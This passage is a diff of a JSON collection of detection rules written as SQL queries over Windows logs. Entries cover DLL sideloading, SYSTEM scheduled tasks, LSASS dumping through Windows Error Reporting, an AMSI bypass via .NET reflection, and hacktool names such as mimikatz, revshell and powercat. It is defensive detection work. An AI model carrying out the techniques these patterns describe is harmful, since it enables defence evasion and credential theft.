ESCAPE '\\' OR CommandLine LIKE '%program files%' ESCAPE '\\')))) OR (NewProcessName LIKE '%\\\\netsh.exe' ESCAPE '\\' AND NOT ((CommandLine LIKE '%add portopening%' ESCAPE '\\' OR CommandLine LIKE '%rule name%' ESCAPE '\\')))) OR ((NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND NOT (CommandLine LIKE '%.spl%' ESCAPE '\\'))) OR ((NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR OriginalFileName = 'RUNDLL32.EXE') AND CommandLine LIKE '%rundll32.exe' ESCAPE '\\')))" ], - "filename": "image_load_side_load_vmware_xfer.yml" + "filename": "proc_creation_win_spoolsv_susp_child_processes.yml" }, { - "title": "Aruba Network Service Potential DLL Sideloading", - "id": "90ae0469-0cee-4509-b67f-e5efcef040f7", + "title": "Schtasks Creation Or Modification With SYSTEM Privileges", + "id": "89ca78fd-b37c-4310-b3d3-81a023f83936", "status": "experimental", - "description": "Detects potential DLL sideloading activity via the Aruba Networks Virtual Intranet Access \"arubanetsvc.exe\" process using DLL Search Order Hijacking", + "description": "Detects the creation or update of a scheduled task to run with \"NT AUTHORITY\\SYSTEM\" privileges", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.privilege_escalation", + "attack.execution", "attack.persistence", - "attack.t1574.001", - "attack.t1574.002" + "attack.t1053.005" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((NewProcessName LIKE '%\\\\arubanetsvc.exe' ESCAPE '\\' AND (ImageLoaded LIKE '%\\\\wtsapi32.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\msvcr100.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\msvcp100.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dbghelp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dbgcore.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wininet.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\iphlpapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\version.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\cryptsp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\cryptbase.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wldp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\profapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\sspicli.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\winsta.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dpapi.dll' ESCAPE '\\')) AND NOT ((ImageLoaded LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\WinSxS\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\schtasks.exe' ESCAPE '\\' AND (CommandLine LIKE '% /change %' ESCAPE '\\' OR CommandLine LIKE '% /create %' ESCAPE '\\') AND CommandLine LIKE '%/ru %' ESCAPE '\\' AND (CommandLine LIKE '%NT AUT%' ESCAPE '\\' OR CommandLine LIKE '% SYSTEM %' ESCAPE '\\')) AND NOT ((ParentProcessName LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' AND ParentProcessName LIKE '%TeamViewer\\_.exe%' ESCAPE '\\' AND NewProcessName LIKE '%\\\\schtasks.exe' ESCAPE '\\' AND CommandLine LIKE '%/TN TVInstallRestore%' ESCAPE '\\') OR ((CommandLine LIKE '%/Create /F /RU System /SC WEEKLY /TN AviraSystemSpeedupVerify /TR %' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Program Files (x86)\\\\Avira\\\\System Speedup\\\\setup\\\\avira\\_speedup\\_setup.exe%' ESCAPE '\\' OR CommandLine LIKE '%/VERIFY /VERYSILENT /NOSTART /NODOTNET /NORESTART\" /RL HIGHEST%' ESCAPE '\\'))))" ], - "filename": "image_load_side_load_aruba_networks_virtual_intranet_access.yml" + "filename": "proc_creation_win_schtasks_system.yml" }, { - "title": "Suspicious Unsigned Dbghelp/Dbgcore DLL Loaded", - "id": "bdc64095-d59a-42a2-8588-71fd9c9d9abc", + "title": "Suspicious OfflineScannerShell.exe Execution From Another Folder", + "id": "02b18447-ea83-4b1b-8805-714a8a34546a", "status": "test", - "description": "Detects the load of dbghelp/dbgcore DLL (used to make memory dumps) by suspicious processes.\nTools like ProcessHacker and some attacker tradecract use MiniDumpWriteDump API found in dbghelp.dll or dbgcore.dll.\nAs an example, SilentTrynity C2 Framework has a module that leverages this API to dump the contents of Lsass.exe and transfer it over the network back to the attacker's machine.\n", - "author": "Perez Diego (@darkquassar), oscd.community, Ecco", + "description": "Use OfflineScannerShell.exe to execute mpclient.dll library in the current working directory", + "author": "frack113", "tags": [ - "attack.credential_access", - "attack.t1003.001" + "attack.defense_evasion", + "attack.t1218" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((ImageLoaded LIKE '%\\\\dbghelp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dbgcore.dll' ESCAPE '\\') AND Signed = 'false')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND NewProcessName LIKE '%\\\\OfflineScannerShell.exe' ESCAPE '\\' AND NOT ((CurrentDirectory LIKE 'C:\\\\Program Files\\\\Windows Defender\\\\Offline\\\\' ESCAPE '\\') OR (CurrentDirectory = '')))" ], - "filename": "image_load_dll_dbghelp_dbgcore_unsigned_load.yml" + "filename": "proc_creation_win_lolbin_offlinescannershell.yml" }, { - "title": "DLL Load By System Process From Suspicious Locations", - "id": "9e9a9002-56c4-40fd-9eff-e4b09bfa5f6c", + "title": "Potential Credential Dumping Via WER", + "id": "9a4ccd1a-3526-4d99-b980-9f9c5d3a6ff3", "status": "experimental", - "description": "Detects when a system process (ie located in system32, syswow64...etc) loads a DLL from a suspicious location such as %temp%", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects potential credential dumping via Windows Error Reporting LSASS Shtinkering technique which uses the Windows Error Reporting to dump lsass", + "author": "@pbssubhash , Nasreddine Bencherchali", "tags": [ - "attack.defense_evasion", - "attack.t1070" + "attack.credential_access", + "attack.t1003.001" ], "falsepositives": [ - "Unknown" + "Windows Error Reporting might produce similar behavior. In that case, check the PID associated with the \"-p\" parameter in the CommandLine." ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((NewProcessName LIKE 'C:\\\\Windows\\\\%' ESCAPE '\\' AND (ImageLoaded LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\Downloads\\\\%' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' OR ImageLoaded LIKE '%C:\\\\PerfLogs\\\\%' ESCAPE '\\')) AND NOT ((NewProcessName LIKE '%\\\\msiexec.exe' ESCAPE '\\' OR (ImageLoaded LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\') OR (NewProcessName LIKE 'C:\\\\Windows\\\\SysWOW64\\\\rundll32.exe' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\rundll32.exe' ESCAPE '\\') OR CommandLine LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' AND CommandLine LIKE '%\\\\setup.exe%' ESCAPE '\\') OR (NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\cleanmgr.exe' ESCAPE '\\' AND ImageLoaded LIKE '%\\\\ssshim.dll' ESCAPE '\\') OR (NewProcessName LIKE 'C:\\\\Windows\\\\Microsoft.NET\\\\Framework\\\\v%' ESCAPE '\\' AND NewProcessName LIKE '%\\\\mscorsvw.exe' ESCAPE '\\' AND ImageLoaded LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\Werfault.exe' ESCAPE '\\' OR OriginalFileName = 'WerFault.exe') AND ((ParentUser LIKE '%AUTHORI%' ESCAPE '\\' OR ParentUser LIKE '%AUTORI%' ESCAPE '\\') AND (User LIKE '%AUTHORI%' ESCAPE '\\' OR User LIKE '%AUTORI%' ESCAPE '\\') AND CommandLine LIKE '% -u -p %' ESCAPE '\\' AND CommandLine LIKE '% -ip %' ESCAPE '\\' AND CommandLine LIKE '% -s %' ESCAPE '\\')) AND NOT ((ParentProcessName LIKE 'C:\\\\Windows\\\\System32\\\\lsass.exe' ESCAPE '\\')))" ], - "filename": "image_load_susp_dll_load_system_process.yml" + "filename": "proc_creation_win_werfault_lsass_shtinkering.yml" }, { - "title": "Wmiprvse Wbemcomn DLL Hijack", - "id": "7707a579-e0d8-4886-a853-ce47e4575aaa", + "title": "Logon Scripts (UserInitMprLogonScript)", + "id": "0a98a10c-685d-4ab0-bddc-b6bdd1d48458", "status": "test", - "description": "Detects a threat actor creating a file named `wbemcomn.dll` in the `C:\\Windows\\System32\\wbem\\` directory over the network and loading it for a WMI DLL Hijack scenario.", - "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", - "tags": [ - "attack.execution", - "attack.t1047", - "attack.lateral_movement", - "attack.t1021.002" + "description": "Detects creation or execution of UserInitMprLogonScript persistence method", + "author": "Tom Ueltschi (@c_APT_ure), Tim Shelton", + "tags": [ + "attack.t1037.001", + "attack.persistence" ], "falsepositives": [ - "Unknown" + "Exclude legitimate logon scripts" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (NewProcessName LIKE '%\\\\wmiprvse.exe' ESCAPE '\\' AND ImageLoaded LIKE '%\\\\wbem\\\\wbemcomn.dll' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (CommandLine LIKE '%UserInitMprLogonScript%' ESCAPE '\\' OR (ParentProcessName LIKE '%\\\\userinit.exe' ESCAPE '\\' AND NOT ((CommandLine LIKE '%netlogon%.bat%' ESCAPE '\\' OR CommandLine LIKE '%UsrLogon.cmd%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\WINDOWS\\\\Explorer.EXE%' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\explorer.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\proquota.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Citrix\\\\System32\\\\icast.exe' ESCAPE '\\')))))" ], - "filename": "image_load_wmiprvse_wbemcomn_dll_hijack.yml" + "filename": "proc_creation_win_persistence_userinitmprlogonscript.yml" }, { - "title": "Suspicious Volume Shadow Copy VSS_PS.dll Load", - "id": "333cdbe8-27bb-4246-bf82-b41a0dca4b70", + "title": "Wusa Extracting Cab Files", + "id": "59b39960-5f9d-4a49-9cef-1e4d2c1d0cb9", "status": "experimental", - "description": "Detects the image load of vss_ps.dll by uncommon executables", - "author": "Markus Neis, @markus_neis", + "description": "Detects usage of the \"wusa.exe\" (Windows Update Standalone Installer) utility to extract cab using the \"/extract\" argument which is not longer supported. This could indicate an attacker using an old technique", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.impact", - "attack.t1490" + "attack.execution" ], "falsepositives": [ - "Unknown" + "The \"extract\" flag still works on older 'wusa.exe' versions, which could be a legitimate use (monitor the path of the cab being extracted)" + ], + "level": "medium", + "rule": [ + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\wusa.exe' ESCAPE '\\' AND CommandLine LIKE '%/extract:%' ESCAPE '\\')" + ], + "filename": "proc_creation_win_wusa_cab_files_extraction.yml" + }, + { + "title": "Suspicious Program Names", + "id": "efdd8dd5-cee8-4e59-9390-7d4d5e4dd6f6", + "status": "test", + "description": "Detects suspicious patterns in program names or folders that are often found in malicious samples or hacktools", + "author": "Florian Roth (Nextron Systems)", + "falsepositives": [ + "Legitimate tools that accidentally match on the searched patterns" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (ImageLoaded LIKE '%\\\\vss\\_ps.dll' ESCAPE '\\' AND NOT ((NewProcessName LIKE 'C:\\\\Windows\\\\%' ESCAPE '\\' AND (NewProcessName LIKE '%\\\\clussvc.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\dismhost.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\dllhost.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\inetsrv\\\\appcmd.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\inetsrv\\\\iissetup.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\msiexec.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\searchindexer.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\srtasks.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\svchost.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\taskhostw.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\thor.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\thor64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\tiworker.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\vssvc.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\WmiPrvSE.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\System32\\\\SystemPropertiesAdvanced.exe' ESCAPE '\\')) OR ((NewProcessName LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\')) OR (CommandLine LIKE 'C:\\\\$WinREAgent\\\\Scratch\\\\%' ESCAPE '\\' AND CommandLine LIKE '%\\\\dismhost.exe {%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\CVE-202%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\CVE202%' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\poc.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\artifact.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\artifact64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\artifact\\_protected.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\artifact32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\artifact32big.exe' ESCAPE '\\' OR NewProcessName LIKE '%obfuscated.exe' ESCAPE '\\' OR NewProcessName LIKE '%obfusc.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\meterpreter' ESCAPE '\\') OR (CommandLine LIKE '%inject.ps1%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-CVE%' ESCAPE '\\' OR CommandLine LIKE '%pupy.ps1%' ESCAPE '\\' OR CommandLine LIKE '%payload.ps1%' ESCAPE '\\' OR CommandLine LIKE '%beacon.ps1%' ESCAPE '\\' OR CommandLine LIKE '%PowerView.ps1%' ESCAPE '\\' OR CommandLine LIKE '%bypass.ps1%' ESCAPE '\\' OR CommandLine LIKE '%obfuscated.ps1%' ESCAPE '\\' OR CommandLine LIKE '%obfusc.ps1%' ESCAPE '\\' OR CommandLine LIKE '%obfus.ps1%' ESCAPE '\\' OR CommandLine LIKE '%obfs.ps1%' ESCAPE '\\' OR CommandLine LIKE '%evil.ps1%' ESCAPE '\\' OR CommandLine LIKE '%MiniDogz.ps1%' ESCAPE '\\' OR CommandLine LIKE '%\\_enc.ps1%' ESCAPE '\\' OR CommandLine LIKE '%\\\\shell.ps1%' ESCAPE '\\' OR CommandLine LIKE '%\\\\rshell.ps1%' ESCAPE '\\' OR CommandLine LIKE '%revshell.ps1%' ESCAPE '\\' OR CommandLine LIKE '%\\\\av.ps1%' ESCAPE '\\' OR CommandLine LIKE '%\\\\av\\_test.ps1%' ESCAPE '\\' OR CommandLine LIKE '%adrecon.ps1%' ESCAPE '\\' OR CommandLine LIKE '%mimikatz.ps1%' ESCAPE '\\' OR CommandLine LIKE '%\\\\PowerUp\\_%' ESCAPE '\\' OR CommandLine LIKE '%powerup.ps1%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Temp\\\\a.ps1%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Temp\\\\p.ps1%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Temp\\\\1.ps1%' ESCAPE '\\' OR CommandLine LIKE '%Hound.ps1%' ESCAPE '\\' OR CommandLine LIKE '%encode.ps1%' ESCAPE '\\' OR CommandLine LIKE '%powercat.ps1%' ESCAPE '\\')))" ], - "filename": "image_load_dll_vss_ps_susp_load.yml" + "filename": "proc_creation_win_susp_progname.yml" }, { - "title": "DLL Sideloading Of ShellChromeAPI.DLL", - "id": "ee4c5d06-3abc-48cc-8885-77f1c20f4451", - "status": "experimental", - "description": "Detects processes loading the non-existent DLL \"ShellChromeAPI\". One known example is the \"DeviceEnroller\" binary in combination with the \"PhoneDeepLink\" flag tries to load this DLL.\nAdversaries can drop their own renamed DLL and execute it via DeviceEnroller.exe using this parameter\n", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Renamed ZOHO Dctask64 Execution", + "id": "340a090b-c4e9-412e-bb36-b4b16fe96f9b", + "status": "test", + "description": "Detects a renamed dctask64.exe used for process injection, command execution, process creation with a signed binary by ZOHO Corporation", + "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.persistence", - "attack.privilege_escalation", - "attack.t1574.001", - "attack.t1574.002" + "attack.t1036", + "attack.t1055.001", + "attack.t1202", + "attack.t1218" ], "falsepositives": [ - "Unknown" + "Unknown yet" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ImageLoaded LIKE '%\\\\ShellChromeAPI.dll' ESCAPE '\\'" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND Hashes LIKE '%6834B1B94E49701D77CCB3C0895E1AFD%' ESCAPE '\\' AND NOT (NewProcessName LIKE '%\\\\dctask64.exe' ESCAPE '\\'))" ], - "filename": "image_load_side_load_shell_chrome_api.yml" + "filename": "proc_creation_win_renamed_dctask64.yml" }, { - "title": "Suspicious WSMAN Provider Image Loads", - "id": "ad1f4bb9-8dfb-4765-adb6-2a7cfb6c0f94", + "title": "Fsutil Behavior Set SymlinkEvaluation", + "id": "c0b2768a-dd06-4671-8339-b16ca8d1f27f", "status": "experimental", - "description": "Detects signs of potential use of the WSMAN provider from uncommon processes locally and remote execution.", - "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", + "description": "A symbolic link is a type of file that contains a reference to another file.\nThis is probably done to make sure that the ransomware is able to follow shortcuts on the machine in order to find the original file to encrypt\n", + "author": "frack113", "tags": [ "attack.execution", - "attack.t1059.001", - "attack.lateral_movement", - "attack.t1021.003" + "attack.t1059" ], "falsepositives": [ - "Unknown" + "Legitimate use" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (((((ImageLoaded LIKE '%\\\\WsmSvc.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\WsmAuto.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\Microsoft.WSMan.Management.ni.dll' ESCAPE '\\') OR OriginalFileName IN ('WsmSvc.dll', 'WSMANAUTOMATION.DLL', 'Microsoft.WSMan.Management.dll')) OR (NewProcessName LIKE '%\\\\svchost.exe' ESCAPE '\\' AND OriginalFileName = 'WsmWmiPl.dll')) AND NOT (((NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%C:\\\\Windows\\\\System32\\\\sdiagnhost.exe' ESCAPE '\\' OR NewProcessName LIKE '%C:\\\\Windows\\\\System32\\\\services.exe' ESCAPE '\\')) OR ((CommandLine LIKE '%svchost.exe -k netsvcs -p -s BITS%' ESCAPE '\\' OR CommandLine LIKE '%svchost.exe -k GraphicsPerfSvcGroup -s GraphicsPerfSvc%' ESCAPE '\\' OR CommandLine LIKE '%svchost.exe -k NetworkService -p -s Wecsvc%' ESCAPE '\\' OR CommandLine LIKE '%svchost.exe -k netsvcs%' ESCAPE '\\')) OR ((NewProcessName LIKE 'C:\\\\Windows\\\\Microsoft.NET\\\\Framework64\\\\v%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\Microsoft.NET\\\\Framework\\\\v%' ESCAPE '\\') AND NewProcessName LIKE '%\\\\mscorsvw.exe' ESCAPE '\\') OR ((NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\Configure-SMRemoting.exe' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\ServerManager.exe' ESCAPE '\\')) OR (NewProcessName LIKE 'C:\\\\Windows\\\\Temp\\\\asgard2-agent\\\\%' ESCAPE '\\') OR (NewProcessName LIKE 'C:\\\\Program Files\\\\Citrix\\\\%' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\powershell\\_ise.exe' ESCAPE '\\') OR (NewProcessName LIKE 'C:\\\\$WINDOWS.~BT\\\\Sources\\\\%' ESCAPE '\\'))) AND NOT ((NewProcessName LIKE '%\\\\svchost.exe' ESCAPE '\\' AND CommandLine = '')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\fsutil.exe' ESCAPE '\\' OR OriginalFileName = 'fsutil.exe') AND (CommandLine LIKE '%behavior %' ESCAPE '\\' AND CommandLine LIKE '%set %' ESCAPE '\\' AND CommandLine LIKE '%SymlinkEvaluation%' ESCAPE '\\'))" ], - "filename": "image_load_wsman_provider_image_load.yml" + "filename": "proc_creation_win_fsutil_symlinkevaluation.yml" }, { - "title": "Potential DLL Sideloading Via comctl32.dll", - "id": "6360757a-d460-456c-8b13-74cf0e60cceb", - "status": "experimental", - "description": "Detects potential DLL sideloading using comctl32.dll to obtain system privileges", - "author": "Nasreddine Bencherchali (Nextron Systems), Subhash Popuri (@pbssubhash)", + "title": "Xwizard DLL Sideloading", + "id": "193d5ccd-6f59-40c6-b5b0-8e32d5ddd3d1", + "status": "test", + "description": "Detects the execution of Xwizard tool from the non-default directory which can be used to sideload a custom xwizards.dll", + "author": "Christian Burkard (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.persistence", - "attack.privilege_escalation", - "attack.t1574.001", "attack.t1574.002" ], "falsepositives": [ - "Unlikely" + "Windows installed on non-C drive" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((ImageLoaded LIKE 'C:\\\\Windows\\\\System32\\\\logonUI.exe.local\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\System32\\\\werFault.exe.local\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\System32\\\\consent.exe.local\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\System32\\\\narrator.exe.local\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\windows\\\\system32\\\\wermgr.exe.local\\\\%' ESCAPE '\\') AND ImageLoaded LIKE '%\\\\comctl32.dll' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND NewProcessName LIKE '%\\\\xwizard.exe' ESCAPE '\\' AND NOT (NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\'))" ], - "filename": "image_load_side_load_comctl32.yml" + "filename": "proc_creation_win_lolbin_dll_sideload_xwizard.yml" }, { - "title": "Svchost DLL Search Order Hijack", - "id": "602a1f13-c640-4d73-b053-be9a2fa58b77", - "status": "test", - "description": "Detects DLL sideloading of DLLs that are loaded by the SCM for some services (IKE, IKEEXT, SessionEnv) which do not exists on a typical modern system\nIKEEXT and SessionEnv service, as they call LoadLibrary on files that do not exist within C:\\Windows\\System32\\ by default.\nAn attacker can place their malicious logic within the PROCESS_ATTACH block of their library and restart the aforementioned services \"svchost.exe -k netsvcs\" to gain code execution on a remote machine.\n", - "author": "SBousseaden", + "title": "Browser Started with Remote Debugging", + "id": "b3d34dc5-2efd-4ae3-845f-8ec14921f449", + "status": "experimental", + "description": "Detects browsers starting with the remote debugging flags. Which is a technique often used to perform browser injection attacks", + "author": "pH-T (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.persistence", - "attack.defense_evasion", - "attack.t1574.002", - "attack.t1574.001" + "attack.credential_access", + "attack.t1185" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((NewProcessName LIKE '%\\\\svchost.exe' ESCAPE '\\' AND (ImageLoaded LIKE '%\\\\tsmsisrv.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\tsvipsrv.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wlbsctrl.dll' ESCAPE '\\')) AND NOT (ImageLoaded LIKE 'C:\\\\Windows\\\\WinSxS\\\\%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (CommandLine LIKE '% --remote-debugging-%' ESCAPE '\\' OR (NewProcessName LIKE '%\\\\firefox.exe' ESCAPE '\\' AND CommandLine LIKE '% -start-debugger-server%' ESCAPE '\\')))" ], - "filename": "image_load_side_load_svchost_dlls.yml" + "filename": "proc_creation_win_browsers_remote_debugging.yml" }, { - "title": "Windows Spooler Service Suspicious Binary Load", - "id": "02fb90de-c321-4e63-a6b9-25f4b03dfd14", - "status": "experimental", - "description": "Detect DLL Load from Spooler Service backup folder", - "author": "FPT.EagleEye, Thomas Patzke (improvements)", + "title": "Potential AMSI Bypass Via .NET Reflection", + "id": "30edb182-aa75-42c0-b0a9-e998bb29067c", + "status": "test", + "description": "Detects Request to \"amsiInitFailed\" that can be used to disable AMSI Scanning", + "author": "Markus Neis, @Kostastsale", "tags": [ - "attack.persistence", "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1574", - "cve.2021.1675", - "cve.2021.34527" + "attack.t1562.001" ], "falsepositives": [ - "Loading of legitimate driver" + "Unlikely" ], - "level": "informational", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (NewProcessName LIKE '%\\\\spoolsv.exe' ESCAPE '\\' AND (ImageLoaded LIKE '%\\\\Windows\\\\System32\\\\spool\\\\drivers\\\\x64\\\\3\\\\%' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\Windows\\\\System32\\\\spool\\\\drivers\\\\x64\\\\4\\\\%' ESCAPE '\\') AND ImageLoaded LIKE '%.dll' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '%System.Management.Automation.AmsiUtils%' ESCAPE '\\' OR CommandLine LIKE '%amsiInitFailed%' ESCAPE '\\') OR (CommandLine LIKE '%[Ref].Assembly.GetType%' ESCAPE '\\' AND CommandLine LIKE '%SetValue($null,$true)%' ESCAPE '\\' AND CommandLine LIKE '%NonPublic,Static%' ESCAPE '\\')))" ], - "filename": "image_load_spoolsv_dll_load.yml" + "filename": "proc_creation_win_powershell_amsi_init_failed_bypass.yml" }, { - "title": "UIPromptForCredentials DLLs", - "id": "9ae01559-cf7e-4f8e-8e14-4c290a1b4784", + "title": "Add New Download Source To Winget", + "id": "05ebafc8-7aa2-4bcd-a269-2aec93f9e842", "status": "experimental", - "description": "Detects potential use of UIPromptForCredentials functions by looking for some of the DLLs needed for it.", - "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", + "description": "Detects usage of winget to add new additional download sources", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.collection", - "attack.t1056.002" + "attack.defense_evasion", + "attack.execution", + "attack.t1059" ], "falsepositives": [ - "Other legitimate processes loading those DLLs in your environment." + "False positive are expected with legitimate sources" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (((ImageLoaded LIKE '%\\\\credui.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wincredui.dll' ESCAPE '\\') OR OriginalFileName IN ('credui.dll', 'wincredui.dll')) AND NOT (((NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\')) OR ((NewProcessName LIKE '%\\\\opera\\_autoupdate.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\procexp64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\procexp.exe' ESCAPE '\\')) OR ((NewProcessName LIKE 'C:\\\\Windows\\\\ImmersiveControlPanel\\\\SystemSettings.exe' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\explorer.exe' ESCAPE '\\')) OR (NewProcessName LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND (NewProcessName LIKE '%\\\\AppData\\\\Roaming\\\\Spotify\\\\Spotify.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\Teams\\\\current\\\\Teams.exe' ESCAPE '\\' OR NewProcessName LIKE 